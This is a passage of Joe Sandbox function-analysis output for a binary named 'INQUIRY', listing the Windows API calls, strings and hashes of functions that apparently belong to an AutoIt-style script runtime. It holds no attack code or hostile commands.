                                                                                              • _memset.LIBCMT ref: 00A9A259
                                                                                              • DestroyWindow.USER32(?,?), ref: 00A9A2D3
                                                                                                • Part of subcall function 00A17BCC: _memmove.LIBCMT ref: 00A17C06
                                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00A9A34D
                                                                                              • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00A9A36F
                                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A9A382
                                                                                              • DestroyWindow.USER32(00000000), ref: 00A9A3A4
                                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00A10000,00000000), ref: 00A9A3DB
                                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A9A3F4
                                                                                              • GetDesktopWindow.USER32 ref: 00A9A40D
                                                                                              • GetWindowRect.USER32(00000000), ref: 00A9A414
                                                                                              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00A9A42C
                                                                                              • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00A9A444
                                                                                                • Part of subcall function 00A125DB: GetWindowLongW.USER32(?,000000EB), ref: 00A125EC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                              • String ID: 0$tooltips_class32
                                                                                              • API String ID: 1297703922-3619404913
                                                                                              • Opcode ID: c6293aed63e6a4d88ea740e23152583d3b99dae34d3582e3e5db6016023aa24f
                                                                                              • Instruction ID: 3e5020f7b20b483f33b226857c5670e898848929ec521b513cbf646afca974ef
                                                                                              • Opcode Fuzzy Hash: c6293aed63e6a4d88ea740e23152583d3b99dae34d3582e3e5db6016023aa24f
                                                                                              • Instruction Fuzzy Hash: 2971AE71640344AFDB21CF68CC49FAA77E5FB98300F04451EF9868B2A0DB70E942DB92
                                                                                              Function 00A9C5FE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A12612: GetWindowLongW.USER32(?,000000EB), ref: 00A12623
                                                                                              • DragQueryPoint.SHELL32(?,?), ref: 00A9C627
                                                                                                • Part of subcall function 00A9AB37: ClientToScreen.USER32(?,?), ref: 00A9AB60
                                                                                                • Part of subcall function 00A9AB37: GetWindowRect.USER32(?,?), ref: 00A9ABD6
                                                                                                • Part of subcall function 00A9AB37: PtInRect.USER32(?,?,00A9C014), ref: 00A9ABE6
                                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00A9C690
                                                                                              • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00A9C69B
                                                                                              • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00A9C6BE
                                                                                              • _wcscat.LIBCMT ref: 00A9C6EE
                                                                                              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00A9C705
                                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00A9C71E
                                                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 00A9C735
                                                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 00A9C757
                                                                                              • DragFinish.SHELL32(?), ref: 00A9C75E
                                                                                              • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00A9C851
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                              • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                              • API String ID: 169749273-3440237614
                                                                                              • Opcode ID: 7b09bbb38495c06674bd8410106b7a0dd95988d3f6627e63e4b91d658883c00b
                                                                                              • Instruction ID: 902ae1e83ec8d03131448b5055f656e8a8e8f2c3a228e52a7bd0bc442fb593ea
                                                                                              • Opcode Fuzzy Hash: 7b09bbb38495c06674bd8410106b7a0dd95988d3f6627e63e4b91d658883c00b
                                                                                              • Instruction Fuzzy Hash: A4615B71608300AFCB01EFA4DD85DAFBBE8FF89750F10092EF695961A1DB709949CB52
                                                                                              Function 00A94392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CharUpperBuffW.USER32(?,?), ref: 00A94424
                                                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00A9446F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: BuffCharMessageSendUpper
                                                                                              • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                              • API String ID: 3974292440-4258414348
                                                                                              • Opcode ID: 3b3ef91846cca336430bc29bff9ae9964318a4631fbece38efa481071ad10714
                                                                                              • Instruction ID: 133a1afa2e17072ddc508650a1af4ecc87eb996f50c472142c66aaa567835214
                                                                                              • Opcode Fuzzy Hash: 3b3ef91846cca336430bc29bff9ae9964318a4631fbece38efa481071ad10714
                                                                                              • Instruction Fuzzy Hash: 30913C716047019FCB04EF20C561EAEB7E5AF99394F05486CF8965B3A2CB31ED4ACB85
                                                                                              Function 00A9B7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00A9B8B4
                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00A96B11,?), ref: 00A9B910
                                                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00A9B949
                                                                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00A9B98C
                                                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00A9B9C3
                                                                                              • FreeLibrary.KERNEL32(?), ref: 00A9B9CF
                                                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00A9B9DF
                                                                                              • DestroyIcon.USER32(?), ref: 00A9B9EE
                                                                                              • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00A9BA0B
                                                                                              • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00A9BA17
                                                                                                • Part of subcall function 00A32EFD: __wcsicmp_l.LIBCMT ref: 00A32F86
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                              • String ID: .dll$.exe$.icl
                                                                                              • API String ID: 1212759294-1154884017
                                                                                              • Opcode ID: 2bbb1de0e50905641c05d5e16976a5bc4f04370e913d2f80a291d4df4a5fab59
                                                                                              • Instruction ID: 540f3e38bd8db24812f0175e8296aa5e1ef80d1e95f096971fdc32deabd0b559
                                                                                              • Opcode Fuzzy Hash: 2bbb1de0e50905641c05d5e16976a5bc4f04370e913d2f80a291d4df4a5fab59
                                                                                              • Instruction Fuzzy Hash: 2F61DD71A20219BEEF14DFA4EE45FBA7BACEB08710F10851AF915D61C0DB749981DBA0
                                                                                              Function 00A7DC1A Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLocalTime.KERNEL32(?), ref: 00A7DCDC
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00A7DCEC
                                                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00A7DCF8
                                                                                              • __wsplitpath.LIBCMT ref: 00A7DD56
                                                                                              • _wcscat.LIBCMT ref: 00A7DD6E
                                                                                              • _wcscat.LIBCMT ref: 00A7DD80
                                                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00A7DD95
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00A7DDA9
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00A7DDDB
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00A7DDFC
                                                                                              • _wcscpy.LIBCMT ref: 00A7DE08
                                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00A7DE47
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                              • String ID: *.*
                                                                                              • API String ID: 3566783562-438819550
                                                                                              • Opcode ID: c9e2fb9a145c4450b3a9cc5188de248c6d29c38946580fb6b560daf6337eee16
                                                                                              • Instruction ID: c52e3f4cd646ebab6d6ee0811d7fd2e3b8eba3735a3274114f62a55beb00e4a0
                                                                                              • Opcode Fuzzy Hash: c9e2fb9a145c4450b3a9cc5188de248c6d29c38946580fb6b560daf6337eee16
                                                                                              • Instruction Fuzzy Hash: 5A6139765082059FCB10EF60C954AAAB3F8FF89314F04892EF99997251DB31EA45CB92
                                                                                              Function 00A79C38 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00A79C7F
                                                                                                • Part of subcall function 00A17DE1: _memmove.LIBCMT ref: 00A17E22
                                                                                              • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00A79CA0
                                                                                              • __swprintf.LIBCMT ref: 00A79CF9
                                                                                              • __swprintf.LIBCMT ref: 00A79D12
                                                                                              • _wprintf.LIBCMT ref: 00A79DB9
                                                                                              • _wprintf.LIBCMT ref: 00A79DD7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: LoadString__swprintf_wprintf$_memmove
                                                                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                              • API String ID: 311963372-3080491070
                                                                                              • Opcode ID: 134faf85b1bcc80f6ec40def994cf64d456263faed94a2fc12c2a5644ede66ef
                                                                                              • Instruction ID: 4068d81bdda8b5bfeda092ec2755b283b7daa372aaa1a594639a5cbb33df88f5
                                                                                              • Opcode Fuzzy Hash: 134faf85b1bcc80f6ec40def994cf64d456263faed94a2fc12c2a5644ede66ef
                                                                                              • Instruction Fuzzy Hash: A5516272905509BECF14EBE0DE46EEEB778AF14300F504466F509720A2EB352F99CB61
                                                                                              Function 00A7A352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A19837: __itow.LIBCMT ref: 00A19862
                                                                                                • Part of subcall function 00A19837: __swprintf.LIBCMT ref: 00A198AC
                                                                                              • CharLowerBuffW.USER32(?,?), ref: 00A7A3CB
                                                                                              • GetDriveTypeW.KERNEL32 ref: 00A7A418
                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A7A460
                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A7A497
                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A7A4C5
                                                                                                • Part of subcall function 00A17BCC: _memmove.LIBCMT ref: 00A17C06
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                              • API String ID: 2698844021-4113822522
                                                                                              • Opcode ID: e9bf94624ca95caed130015be81f0aa1bd6552bb6b3205ca039ef9e8aaae8eb6
                                                                                              • Instruction ID: 9631be307a51abb3ea2273474a18c0d225674e9962201acb5675474e1819f0c4
                                                                                              • Opcode Fuzzy Hash: e9bf94624ca95caed130015be81f0aa1bd6552bb6b3205ca039ef9e8aaae8eb6
                                                                                              • Instruction Fuzzy Hash: 27512A75508205AFC700EF20C991DAEB7F8FF94758F10886DF89A97261DB31AD4ACB52
                                                                                              Function 00A6F8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,00A4E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 00A6F8DF
                                                                                              • LoadStringW.USER32(00000000,?,00A4E029,00000001), ref: 00A6F8E8
                                                                                                • Part of subcall function 00A17DE1: _memmove.LIBCMT ref: 00A17E22
                                                                                              • GetModuleHandleW.KERNEL32(00000000,00AD5310,?,00000FFF,?,?,00A4E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 00A6F90A
                                                                                              • LoadStringW.USER32(00000000,?,00A4E029,00000001), ref: 00A6F90D
                                                                                              • __swprintf.LIBCMT ref: 00A6F95D
                                                                                              • __swprintf.LIBCMT ref: 00A6F96E
                                                                                              • _wprintf.LIBCMT ref: 00A6FA17
                                                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00A6FA2E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                                              • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                              • API String ID: 984253442-2268648507
                                                                                              • Opcode ID: 2bd6b84af9c73de6986e5c315c95866e6f0e16cb7ccc124f24468deb29dec718
                                                                                              • Instruction ID: a0b945536a237fe4bb8ae9ce6a72645be78357175c0551b7b649d372803f4770
                                                                                              • Opcode Fuzzy Hash: 2bd6b84af9c73de6986e5c315c95866e6f0e16cb7ccc124f24468deb29dec718
                                                                                              • Instruction Fuzzy Hash: 76410D72904109AACF05FBE4DE46EEE7778AF54340F500465F506B6092EF356F49CB61
                                                                                              Function 00A4A8CB Relevance: 22.7, APIs: 15, Instructions: 211COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                                                                                              • String ID:
                                                                                              • API String ID: 884005220-0
                                                                                              • Opcode ID: 63e374e305d5ffdeaf87c263206dc1135f651a4bb10ec265bfe665ab2c5c5ee3
                                                                                              • Instruction ID: 6d2256cb5ecd9a551698a82c40b01ed7beaba91efe37f5f51aa6f145a1430cc9
                                                                                              • Opcode Fuzzy Hash: 63e374e305d5ffdeaf87c263206dc1135f651a4bb10ec265bfe665ab2c5c5ee3
                                                                                              • Instruction Fuzzy Hash: 51614876981302AFDF209F64DE0176A77A4EFA13A0F214225F815A71D2DB78CD01C793
                                                                                              Function 00A9BA33 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00A9BA56
                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 00A9BA6D
                                                                                              • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00A9BA78
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00A9BA85
                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00A9BA8E
                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00A9BA9D
                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00A9BAA6
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00A9BAAD
                                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00A9BABE
                                                                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,00AA2CAC,?), ref: 00A9BAD7
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00A9BAE7
                                                                                              • GetObjectW.GDI32(?,00000018,000000FF), ref: 00A9BB0B
                                                                                              • CopyImage.USER32(?,00000000,?,?,00002000), ref: 00A9BB36
                                                                                              • DeleteObject.GDI32(00000000), ref: 00A9BB5E
                                                                                              • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00A9BB74
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                              • String ID:
                                                                                              • API String ID: 3840717409-0
                                                                                              • Opcode ID: 9f17b8de9df6cabecbcff9a5005f3d9d21808a1cd3a7a3861fce2d015f27c63b
                                                                                              • Instruction ID: 7e774b76f210af669e37fd0fbee33e07839848e4ab6b90d893e10fe09df43702
                                                                                              • Opcode Fuzzy Hash: 9f17b8de9df6cabecbcff9a5005f3d9d21808a1cd3a7a3861fce2d015f27c63b
                                                                                              • Instruction Fuzzy Hash: F5410975600208EFDB11DFA5ED88EAA7BF9FB89711F104169F909D72A0DB709D02CB60
                                                                                              Function 00A7D899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __wsplitpath.LIBCMT ref: 00A7DA10
                                                                                              • _wcscat.LIBCMT ref: 00A7DA28
                                                                                              • _wcscat.LIBCMT ref: 00A7DA3A
                                                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00A7DA4F
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00A7DA63
                                                                                              • GetFileAttributesW.KERNEL32(?), ref: 00A7DA7B
                                                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00A7DA95
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00A7DAA7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                              • String ID: *.*
                                                                                              • API String ID: 34673085-438819550
                                                                                              • Opcode ID: 105b94f80ffaa04539460bff08ee87c788b690e295d21ff9c386b95c652a9725
                                                                                              • Instruction ID: aa139af06cd69f784ca73cc1e2c072130acfa4584a3b52cad660f44e877ab781
                                                                                              • Opcode Fuzzy Hash: 105b94f80ffaa04539460bff08ee87c788b690e295d21ff9c386b95c652a9725
                                                                                              • Instruction Fuzzy Hash: 288161726042419FCB24DF64CD44AAAB7F8BF89350F18C82EF98DDB651E630D945CB52
                                                                                              Function 00A9C1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A12612: GetWindowLongW.USER32(?,000000EB), ref: 00A12623
                                                                                              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00A9C1FC
                                                                                              • GetFocus.USER32 ref: 00A9C20C
                                                                                              • GetDlgCtrlID.USER32(00000000), ref: 00A9C217
                                                                                              • _memset.LIBCMT ref: 00A9C342
                                                                                              • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00A9C36D
                                                                                              • GetMenuItemCount.USER32(?), ref: 00A9C38D
                                                                                              • GetMenuItemID.USER32(?,00000000), ref: 00A9C3A0
                                                                                              • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00A9C3D4
                                                                                              • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00A9C41C
                                                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00A9C454
                                                                                              • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00A9C489
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
